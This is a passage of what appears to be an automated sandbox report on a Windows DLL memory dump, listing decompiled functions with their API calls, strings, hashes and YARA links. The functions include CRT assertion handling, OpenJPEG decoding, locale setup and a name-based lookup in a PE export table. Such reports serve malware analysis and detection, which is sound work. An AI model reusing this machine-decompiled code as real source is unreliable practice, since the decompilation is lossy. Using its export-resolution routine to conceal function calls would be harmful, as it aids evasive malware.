																							} while (_t149 != _v540);
																							_t197 = _t207 - _t190 >> 1;
																							if(_t197 + _t214 <= _t221) {
																								_push(_v552);
																								goto L52;
																							} else {
																								_push(_t221 - _t214 - 3);
																								_t160 = E6EE4871C(_t197, _t226, _t221, _v552);
																								_t236 = _t236 + 0x10;
																								if(_t160 != 0) {
																									goto L66;
																								} else {
																									_push(L"...");
																									L52:
																									_push(_t221);
																									_push(_t226);
																									_t151 = E6EE4855C();
																									_t236 = _t236 + 0xc;
																									if(_t151 != 0) {
																										goto L66;
																									} else {
																										_t190 = L"\n\n";
																										_t152 = E6EE4855C(_t226, _t221, L"\n\n");
																										_t236 = _t236 + 0xc;
																										if(_t152 != 0) {
																											goto L66;
																										} else {
																											_t153 = E6EE4855C(_t226, _t221, L"For information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts");
																											_t236 = _t236 + 0xc;
																											if(_t153 != 0) {
																												goto L66;
																											} else {
																												_t154 = E6EE4855C(_t226, _t221, L"\n\n");
																												_t236 = _t236 + 0xc;
																												if(_t154 != 0) {
																													goto L66;
																												} else {
																													_t155 = E6EE4855C(_t226, _t221, L"(Press Retry to debug the application - JIT must be enabled)");
																													_t236 = _t236 + 0xc;
																													if(_t155 != 0) {
																														goto L66;
																													} else {
																														return E6EE361A7(_v8 ^ _t229);
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t185 = _t197 * 2 - 0x6a;
									_t197 = 0x20a - _t185;
									_t190 =  &_v532 + _t185;
									_t186 = E6EE3EF21( &_v532 + _t185, _t197, L"...", 6);
									_t236 = _t240 + 0x10;
									if(_t186 != 0) {
										goto L66;
									} else {
										goto L10;
									}
								}
							} else {
								_t188 = E6EE485D1( &_v532, 0x105, L"<program name unknown>");
								_t236 = _t240 + 0xc;
								if(_t188 != 0) {
									goto L66;
								} else {
									goto L6;
								}
							}
						}
					}
				}
			}

APIs

GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6EE3E8CE
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6EE3E8F2

Strings

Line: , xrefs: 6EE3EB0E
Program: , xrefs: 6EE3E890
\, xrefs: 6EE3E9EF
Expression: , xrefs: 6EE3EB88
For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 6EE3EC31
(Press Retry to debug the application - JIT must be enabled), xrefs: 6EE3EC5B
<program name unknown>, xrefs: 6EE3E8FC
File: , xrefs: 6EE3E998
..., xrefs: 6EE3E94D, 6EE3EA6C, 6EE3EABE, 6EE3EC02, 6EE3EC85, 6EE3ECB8
Assertion failed!, xrefs: 6EE3E84C

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
API String ID: 4146042529-3261600717
Opcode ID: 69ce0ddf7613f0dc86d8dc2422fc46a0253b1ac9adaba93324d412450667a21a
Instruction ID: 9fc330178e864edb2c7378999140405ae8c7e5583e21618944f996a037e2d62f
Opcode Fuzzy Hash: 69ce0ddf7613f0dc86d8dc2422fc46a0253b1ac9adaba93324d412450667a21a
Instruction Fuzzy Hash: 0FC12A74A2062AA6C714AAA48C44FDF77BCEF85308F340469FC05D5319F731AE56CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EDDB750, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E6EDDB750(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				intOrPtr _t48;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t60;
				void* _t83;
				void* _t113;

				_t124 = __fp0;
				_t112 = __esi;
				_t111 = __edi;
				_t97 = __edx;
				_t83 = __ecx;
				_t82 = __ebx;
				_t120 = _a8;
				if(_a8 == 0) {
					_push(0x2045);
					E6EE3EEBE(__ebx, __edx, __edi, __esi, _t120, __fp0, L"p_j2k != 00", L"j2k.c");
					_t113 = _t113 + 0xc;
				}
				_t121 = _a4;
				if(_a4 == 0) {
					_push(0x2046);
					E6EE3EEBE(_t82, _t97, _t111, _t112, _t121, _t124, L"p_stream != 00", L"j2k.c");
					_t113 = _t113 + 0xc;
				}
				_t122 = _a16;
				if(_a16 == 0) {
					_push(0x2047);
					E6EE3EEBE(_t82, _t97, _t111, _t112, _t122, _t124, L"p_manager != 00", L"j2k.c");
					_t113 = _t113 + 0xc;
				}
				 *((intOrPtr*)(_a8 + 0x48)) = E6EE20B90(_t83);
				_t98 = _a8;
				if( *((intOrPtr*)(_a8 + 0x48)) != 0) {
					_t48 = E6EDDF930(_t82, _t98, _t111, _t112, _t124, _a8, _a16);
					__eflags = _t48;
					if(_t48 != 0) {
						_t51 = E6EDDFD60(_t82,  *((intOrPtr*)(_a8 + 0xbc)), _t111, _t112, _t124, _a8,  *((intOrPtr*)(_a8 + 0xbc)), _a4, _a16);
						__eflags = _t51;
						if(_t51 != 0) {
							_t52 = E6EDDF0A0(_t82, _a8, _t111, _t112, _t124, _a8, _a16);
							__eflags = _t52;
							if(_t52 != 0) {
								_t89 = _a8;
								_t55 = E6EDDFD60(_t82, _a8, _t111, _t112, _t124, _a8,  *((intOrPtr*)(_a8 + 0xb8)), _a4, _a16);
								__eflags = _t55;
								if(_t55 != 0) {
									 *_a12 = E6EE20B90(_t89);
									__eflags =  *_a12;
									if( *_a12 != 0) {
										E6EE20D60(_t82,  *_a12, _t111, _t112, _t124,  *((intOrPtr*)(_a8 + 0x48)),  *_a12);
										_t60 = E6EDE3A60( *((intOrPtr*)(_a8 + 0x48)), _a8);
										__eflags = _t60;
										if(_t60 != 0) {
											return 1;
										}
										 *0x6ee67160( *_a12);
										 *_a12 = 0;
										return 0;
									}
									return 0;
								}
								 *0x6ee67160( *((intOrPtr*)(_a8 + 0x48)));
								 *((intOrPtr*)(_a8 + 0x48)) = 0;
								return 0;
							}
							 *0x6ee67160( *((intOrPtr*)(_a8 + 0x48)));
							 *((intOrPtr*)(_a8 + 0x48)) = 0;
							return 0;
						}
						 *0x6ee67160( *((intOrPtr*)(_a8 + 0x48)));
						 *((intOrPtr*)(_a8 + 0x48)) = 0;
						return 0;
					}
					 *0x6ee67160( *((intOrPtr*)(_a8 + 0x48)));
					 *((intOrPtr*)(_a8 + 0x48)) = 0;
					return 0;
				} else {
					return 0;
				}
			}

APIs

_opj_image_destroy@4.BCCW1XUJAH(?), ref: 6EDDB7E0
_opj_image_destroy@4.BCCW1XUJAH(?), ref: 6EDDB820

Strings

j2k.c, xrefs: 6EDDB75E
p_manager != 00, xrefs: 6EDDB79D
j2k.c, xrefs: 6EDDB798
p_j2k != 00, xrefs: 6EDDB763
p_stream != 00, xrefs: 6EDDB780
j2k.c, xrefs: 6EDDB77B

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _opj_image_destroy@4
String ID: j2k.c$j2k.c$j2k.c$p_j2k != 00$p_manager != 00$p_stream != 00
API String ID: 388027570-992503930
Opcode ID: 8ee47bdc652b604e9d6e8c04d360151ec84cf9d96f1ca00655d52a1a74d64a67
Instruction ID: 785a955af766e7e6b51591d60223fb8960f11c0be73501af72da87d451ecff91
Opcode Fuzzy Hash: 8ee47bdc652b604e9d6e8c04d360151ec84cf9d96f1ca00655d52a1a74d64a67
Instruction Fuzzy Hash: B4514A75A14209EFCB40DFA9C884F9A73B9BB48318F208419FD198F385E735E958CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6EE44386, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6EE44386(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x6ee5ef50;
				if(_t68 != 0x6ee5ef50) {
					E6EE4471C(_t68);
					_t36 = _a4;
				}
				E6EE4471C( *((intOrPtr*)(_t36 + 0x3c)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x30)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x34)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x38)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x28)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x2c)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x40)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x44)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6EE441B2(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6EE4421D(_t67, _t72, _t73, _t77);
			}

APIs

_free.LIBCMT ref: 6EE4439C

Part of subcall function 6EE4471C: RtlFreeHeap.NTDLL(00000000,00000000,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?), ref: 6EE44732
Part of subcall function 6EE4471C: GetLastError.KERNEL32(?,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?,?), ref: 6EE44744

_free.LIBCMT ref: 6EE443A8
_free.LIBCMT ref: 6EE443B3
_free.LIBCMT ref: 6EE443BE
_free.LIBCMT ref: 6EE443C9
_free.LIBCMT ref: 6EE443D4
_free.LIBCMT ref: 6EE443DF
_free.LIBCMT ref: 6EE443EA
_free.LIBCMT ref: 6EE443F5
_free.LIBCMT ref: 6EE44403

Strings

Pn, xrefs: 6EE44393

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: Pn
API String ID: 776569668-2102977469
Opcode ID: a44e19a32cf83fa37f1638534ed164baa3c136ad3c26a51a1533c236e92034b3
Instruction ID: 9c716ae7e156ee7335ccf252c8ec6dd83e1d871531587cb8252aeff67bfb221f
Opcode Fuzzy Hash: a44e19a32cf83fa37f1638534ed164baa3c136ad3c26a51a1533c236e92034b3
Instruction Fuzzy Hash: 0121B7BAA00108EFCB41DFD4D884DDE7FB9BF08244F1445AAE5159B220DB31EB56CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6EDD0560, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6EDD0560(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* __ebp;

				_push(__ecx);
				_v8 = __ecx;
				E6EE3449E(_v8, 0);
				E6EDD04C0(_v8 + 4);
				E6EDD04C0(_v8 + 0xc);
				E6EDD04E0(_v8 + 0x14);
				E6EDD04E0(_v8 + 0x1c);
				E6EDD04C0(_v8 + 0x24);
				E6EDD04C0(_v8 + 0x2c);
				if(_a4 == 0) {
					E6EE34451("bad locale name");
				} else {
					E6EE347AB(_v8, _v8, _a4);
				}
				return _v8;
			}

0x6edd0563
0x6edd0564
0x6edd056c
0x6edd0577
0x6edd0582
0x6edd058d
0x6edd0598
0x6edd05a3
0x6edd05ae
0x6edd05b7
0x6edd05d0
0x6edd05b9
0x6edd05c1
0x6edd05c6
0x6edd05db

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6EDD056C
_Yarn.LIBCPMTD ref: 6EDD0577
_Yarn.LIBCPMTD ref: 6EDD0582
_Yarn.LIBCPMTD ref: 6EDD058D
_Yarn.LIBCPMTD ref: 6EDD0598
_Yarn.LIBCPMTD ref: 6EDD05A3
_Yarn.LIBCPMTD ref: 6EDD05AE
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6EDD05C1

Part of subcall function 6EE347AB: _Yarn.LIBCPMT ref: 6EE347CA
Part of subcall function 6EE347AB: _Yarn.LIBCPMT ref: 6EE347EE

Strings

bad locale name, xrefs: 6EDD05CB

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3904239083-1405518554
Opcode ID: 2e7da848fade2533d521e80e8220faf1e89d49667a0d0cf13c8875757938f115
Instruction ID: d424bab7e9b301edd052b2f571ab19b3b6a1f55f09f41602b79ea7589f2e42a2
Opcode Fuzzy Hash: 2e7da848fade2533d521e80e8220faf1e89d49667a0d0cf13c8875757938f115
Instruction Fuzzy Hash: 8E019630901108EBDB19DBD8C9A0EED737A9F8428CF240859D5066A385EA31AF54D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB2E30, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E6EDB2E30(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr* _v28;
				char _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char _v96;
				char _v120;
				char _v144;
				intOrPtr _t125;
				void* _t127;
				signed int _t129;
				signed int _t138;
				intOrPtr _t196;
				void* _t199;

				_t201 = __eflags;
				_push(0xffffffff);
				_push(0x6ee56110);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t196;
				_v20 = _a16;
				_v28 = _a12;
				E6EDB18A0( &_v120, __eflags, "name");
				_v8 = 0;
				E6EDB2DB0( &_v120, 0x6ee572c0);
				_v60 =  *((intOrPtr*)(_v20 + 0x24)) -  *_v28 + _v20;
				E6EDB12B0(__eflags,  &_v96,  &_v120, "name2");
				_v8 = 1;
				_v64 =  *((intOrPtr*)(_v20 + 0x1c)) -  *_v28 + _v20;
				E6EDB2BC0(_t201,  &_v144,  &_v120,  &_v96);
				_t199 = _t196 - 0x80 + 0x18;
				_v8 = 2;
				_v52 =  *((intOrPtr*)(_v20 + 0x20)) -  *_v28 + _v20;
				_v40 = 0;
				_v36 =  *((intOrPtr*)(_v20 + 0x18));
				_v24 = _v36 >> 1;
				_v44 = _v36 + 1;
				while(_v44 != _v24) {
					_v56 =  *((intOrPtr*)(_v52 + _v24 * 4)) -  *_v28 + _v20;
					_v32 = 0;
					while(1) {
						_t127 = E6EDB29F0( &_v144);
						_t203 = _v32 - _t127;
						if(_v32 >= _t127) {
							break;
						}
						E6EDB2B80(_t203, 0x6ee572cc,  *((char*)(E6EDB2D90( &_v144, _v32))));
						_t199 = _t199 + 8;
						_v32 = _v32 + 1;
					}
					_t129 = E6EE3E510(_a4, _v56);
					_t199 = _t199 + 8;
					_v48 = _t129;
					__eflags = _v48;
					if(_v48 <= 0) {
						__eflags = _v48;
						if(_v48 >= 0) {
							_v68 = _a8 +  *((intOrPtr*)(_v64 + ( *(_v60 + _v24 * 2) & 0x0000ffff) * 4));
							_v8 = 1;
							E6EDB1D80( &_v144);
							_v8 = 0;
							E6EDB1D80( &_v96);
							_v8 = 0xffffffff;
							E6EDB1D80( &_v120);
							_t125 = _v68;
						} else {
							_v36 = _v24;
							goto L12;
						}
					} else {
						_v40 = _v24;
						L12:
						_v44 = _v24;
						_t138 = (_v36 - _v40 >> 1) + _v40;
						__eflags = _t138;
						_v24 = _t138;
						continue;
					}
					L14:
					 *[fs:0x0] = _v16;
					return _t125;
				}
				E6EDB30F0( &_v96);
				_push(E6EDB2660( &_v96));
				E6EDB1340(_t120);
				_v72 = 0;
				_v8 = 1;
				E6EDB1D80( &_v144);
				_v8 = 0;
				E6EDB1D80( &_v96);
				_v8 = 0xffffffff;
				E6EDB1D80( &_v120);
				_t125 = _v72;
				goto L14;
			}

APIs

task.LIBCPMTD ref: 6EDB2FF1
task.LIBCPMTD ref: 6EDB2FFD
task.LIBCPMTD ref: 6EDB300C
task.LIBCPMTD ref: 6EDB3045
task.LIBCPMTD ref: 6EDB3051
task.LIBCPMTD ref: 6EDB3060

Strings

name2, xrefs: 6EDB2E96
name, xrefs: 6EDB2E5B

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID: name$name2
API String ID: 1384045349-1546360577
Opcode ID: 5b38dd79b04aff37025f1122e043fb9075649c3f7f91831569a391cdaaf97ea5
Instruction ID: a54adf20c3046a28b597c3117be9860efd90d88fa46769766d7c39b412d35921
Opcode Fuzzy Hash: 5b38dd79b04aff37025f1122e043fb9075649c3f7f91831569a391cdaaf97ea5
Instruction Fuzzy Hash: 8C71E7B5D00219DFCB04CFD8C990AEEBBB5BF49308F248569E45267384EB346A05CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EE474CB, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6EE474CB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t156;
				void* _t163;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t184;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t213;
				intOrPtr* _t221;
				intOrPtr* _t222;
				char* _t229;
				intOrPtr _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int _t241;
				signed int _t242;
				void* _t247;
				signed int _t248;
				intOrPtr _t250;
				signed int _t256;
				signed int _t258;
				signed int _t261;
				signed int* _t262;
				short _t263;
				signed int _t265;
				signed int _t269;
				void* _t271;
				void* _t273;

				_t285 = __fp0;
				_t265 = _t269;
				_t156 =  *0x6ee77a68; // 0xa89efc87
				_v8 = _t156 ^ _t265;
				_push(__ebx);
				_t213 = _a8;
				_push(__esi);
				_push(__edi);
				_t250 = _a4;
				_v736 = _t213;
				_v732 = E6EE444CA(__ecx, __edx, __fp0) + 0x278;
				_t163 = E6EE46BB6(_t213, __edx, _t250, _a12, __fp0, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t271 = _t269 - 0x2e4 + 0x18;
				if(_t163 == 0) {
					L40:
					__eflags = 0;
					goto L41;
				} else {
					_t10 = _t213 + 2; // 0x6
					_t256 = _t10 << 4;
					_t166 =  &_v272;
					_v712 = _t256;
					_t221 =  *((intOrPtr*)(_t256 + _t250));
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t258 = _v712;
						if( *_t166 !=  *_t221) {
							break;
						}
						if( *_t166 == 0) {
							L7:
							_t167 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t166 + 2));
							_v706 = _t263;
							_t258 = _v712;
							if(_t263 !=  *((intOrPtr*)(_t221 + 2))) {
								break;
							} else {
								_t166 = _t166 + 4;
								_t221 = _t221 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L7;
								}
							}
						}
						L9:
						if(_t167 != 0) {
							_t222 =  &_v272;
							_t247 = _t222 + 2;
							do {
								_t168 =  *_t222;
								_t222 = _t222 + 2;
								__eflags = _t168 - _v704;
							} while (_t168 != _v704);
							_v708 = (_t222 - _t247 >> 1) + 1;
							_t171 = E6EE44756(4 + ((_t222 - _t247 >> 1) + 1) * 2);
							_v724 = _t171;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L40;
							} else {
								_v720 =  *((intOrPtr*)(_t258 + _t250));
								_v740 =  *(_t250 + 0xa0 + _t213 * 4);
								_v744 =  *(_t250 + 8);
								_t229 =  &_v272;
								_v728 = _t171 + 4;
								_t173 = E6EE485D1(_t171 + 4, _v708, _t229);
								_t273 = _t271 + 0xc;
								__eflags = _t173;
								if(_t173 != 0) {
									_t174 = _v704;
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									E6EE3AC93();
									asm("int3");
									_push(_t265);
									_push(_t229);
									_v784 = _v784 & 0x00000000;
									_t177 = E6EE44DE4(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t177;
									if(_t177 == 0) {
										L50:
										_t178 = 0xfde9;
									} else {
										_t178 = _v12;
										__eflags = _t178;
										if(_t178 == 0) {
											goto L50;
										}
									}
									return _t178;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t258 + _t250)) = _v728;
									if(_v272 != 0x43) {
										L18:
										_t181 = E6EE46935(_t213, _t250,  &_v700);
										_t248 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L18;
										} else {
											_t248 = _v704;
											_t181 = _t248;
										}
									}
									 *(_t250 + 0xa0 + _t213 * 4) = _t181;
									__eflags = _t213 - 2;
									if(_t213 != 2) {
										__eflags = _t213 - 1;
										if(_t213 != 1) {
											__eflags = _t213 - 5;
											if(_t213 == 5) {
												 *((intOrPtr*)(_t250 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t250 + 0x10)) = _v716;
										}
									} else {
										_t262 = _v732;
										 *(_t250 + 8) = _v716;
										_v708 = _t262[8];
										_t241 = _t262[9];
										_v716 = _t241;
										while(1) {
											__eflags =  *(_t250 + 8) -  *(_t262 + _t248 * 8);
											if( *(_t250 + 8) ==  *(_t262 + _t248 * 8)) {
												break;
											}
											_t210 =  *(_t262 + _t248 * 8);
											_t241 =  *(_t262 + 4 + _t248 * 8);
											 *(_t262 + _t248 * 8) = _v708;
											 *(_t262 + 4 + _t248 * 8) = _v716;
											_t248 = _t248 + 1;
											_t213 = _v736;
											_v708 = _t210;
											_v716 = _t241;
											__eflags = _t248 - 5;
											if(_t248 < 5) {
												continue;
											} else {
											}
											L26:
											__eflags = _t248 - 5;
											if(__eflags == 0) {
												_t202 = E6EE4C37D(_t213, _t248, _t250, _t262, __eflags, _t285, _v704, 1, 0x6ee5f7d0, 0x7f,  &_v528,  *(_t250 + 8), 1);
												_t273 = _t273 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t242 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t265 + _t204 * 2 - 0x20c) =  *(_t265 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E6EE37FB0( &_v528,  *0x6ee77c20, 0xfe);
													_t273 = _t273 + 0xc;
													__eflags = _t206;
													_t242 = 0 | _t206 == 0x00000000;
												}
												_t262[1] = _t242;
												 *_t262 =  *(_t250 + 8);
											}
											 *(_t250 + 0x18) = _t262[1];
											goto L38;
										}
										__eflags = _t248;
										if(_t248 != 0) {
											 *_t262 =  *(_t262 + _t248 * 8);
											_t262[1] =  *(_t262 + 4 + _t248 * 8);
											 *(_t262 + _t248 * 8) = _v708;
											 *(_t262 + 4 + _t248 * 8) = _t241;
										}
										goto L26;
									}
									L38:
									_t182 = _t213 * 0xc;
									_t111 = _t182 + 0x6ee5f858; // 0x6ee35745
									 *0x6ee5714c(_t250);
									_t184 =  *((intOrPtr*)( *_t111))();
									_t233 = _v720;
									__eflags = _t184;
									if(_t184 == 0) {
										__eflags = _t233 - 0x6ee77ce8;
										if(_t233 != 0x6ee77ce8) {
											_t261 = _t213 + _t213;
											__eflags = _t261;
											asm("lock xadd [eax], ecx");
											if(_t261 != 0) {
												goto L45;
											} else {
												E6EE4471C( *((intOrPtr*)(_t250 + 0x28 + _t261 * 8)));
												E6EE4471C( *((intOrPtr*)(_t250 + 0x24 + _t261 * 8)));
												E6EE4471C( *(_t250 + 0xa0 + _t213 * 4));
												_t236 = _v704;
												 *(_v712 + _t250) = _t236;
												 *(_t250 + 0xa0 + _t213 * 4) = _t236;
											}
										}
										_t234 = _v724;
										 *_t234 = 1;
										 *((intOrPtr*)(_t250 + 0x28 + (_t213 + _t213) * 8)) = _t234;
									} else {
										 *((intOrPtr*)(_v712 + _t250)) = _t233;
										E6EE4471C( *(_t250 + 0xa0 + _t213 * 4));
										 *(_t250 + 0xa0 + _t213 * 4) = _v740;
										E6EE4471C(_v724);
										 *(_t250 + 8) = _v744;
										goto L40;
									}
									goto L41;
								}
							}
						} else {
							L41:
							return E6EE361A7(_v8 ^ _t265);
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t167 = _t166 | 0x00000001;
					__eflags = _t167;
					goto L9;
				}
				L52:
			}

APIs

Part of subcall function 6EE444CA: GetLastError.KERNEL32(?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?,?,6EDB28E8,?), ref: 6EE444CF
Part of subcall function 6EE444CA: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?), ref: 6EE4456D

_free.LIBCMT ref: 6EE477B6
_free.LIBCMT ref: 6EE477CF
_free.LIBCMT ref: 6EE4780D
_free.LIBCMT ref: 6EE47816
_free.LIBCMT ref: 6EE47822

Strings

|n, xrefs: 6EE477F0
C, xrefs: 6EE47627

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID: C$|n
API String ID: 3291180501-3839784562
Opcode ID: c335ab8b0dd0c503051ba84c88887ccf25e1a6be3ac5d196a61d1046c6e2e332
Instruction ID: 08a8289ed5c331328b6fb4cdc21aa51faf5f8c239212033aa999023ffd60e5ed
Opcode Fuzzy Hash: c335ab8b0dd0c503051ba84c88887ccf25e1a6be3ac5d196a61d1046c6e2e332
Instruction Fuzzy Hash: 50B16E75A1161ADFDB24CF58D888B99B7B5FF48304F6045AED809A7390E730AE90CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCDA40, Relevance: 12.2, APIs: 8, Instructions: 169
